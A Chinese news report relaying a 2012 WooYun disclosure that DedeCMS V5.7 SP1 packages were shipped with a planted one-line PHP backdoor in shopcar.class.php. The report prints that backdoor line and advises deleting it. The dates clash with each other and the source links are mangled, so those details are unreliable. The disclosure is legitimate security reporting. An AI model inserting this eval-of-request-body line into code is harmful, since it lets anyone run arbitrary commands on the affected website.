Dedecms疑似被植入后门 上传PHP后门可控制整个网站

2012 年 12 月 10 日5100

  Admin5站长网2月21日消息,昨日乌云漏洞报告平台(http://http://www.zjjv.com///)发布漏洞报告,称国内知名开源CMS软件Dedecms被入侵种植后门,影响使用dedecms的网站和企业,后门代码在/include/shopcar.class.php中,希望直接使用dedecms又未作审计的网站速度处理。360网站安全检测官方微博称经过工程师的测试,可以上传PHP后门来控制整个网站。目前已经将该后门加入到webscan网站安全扫描平台扫描库中,希望各网站及时进行扫描确认。

  织梦内容管理系统(DedeCms)早期由IT柏拉图个人开发, 以简单、实用、开源闻名,受到广大个人站长的青睐。DedeCms站长用户众多,目前其官方还未对漏洞做出回应。希望广大使用Dedecms的站长能及时对网站进行安全检测,做好漏洞防范,等待官方给出解决办法。

  漏洞概要

  缺陷编号: WooYun-2012-05416

  漏洞标题: Dedecms疑似被植入后门

  相关厂商: Dedecms

  漏洞作者: jsbug

  提交时间: 2012-03-20

  公开时间: 2012-03-20

  漏洞类型: 成功的入侵事件

  危害等级: 高

  自评Rank: 10

  漏洞状态: 未联系到厂商或者厂商积极忽略

  漏洞来源: http://http://www.zjjv.com//

  分享漏洞: 腾讯微博 新浪微博 Twitter 网易微博 豆瓣

  漏洞详情

  披露状态:

  2012-03-20: 积极联系厂商并且等待厂商认领中,细节不对外公开

  2012-03-20: 厂商已经主动忽略漏洞,细节向公众公开

  简要描述:

  DedeCMS V5.7 SP1正式版

  UTF-8 GBK版本疑似被植入一句话后门

  前几日下载并不存在此代码

  详细说明:

  shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

  

  漏洞证明:

  shopcar.class.php被植入一句话@eval(file_get_contents('php://input'));

  

  修复方案:

  删除@eval(file_get_contents('php://input'));

0 0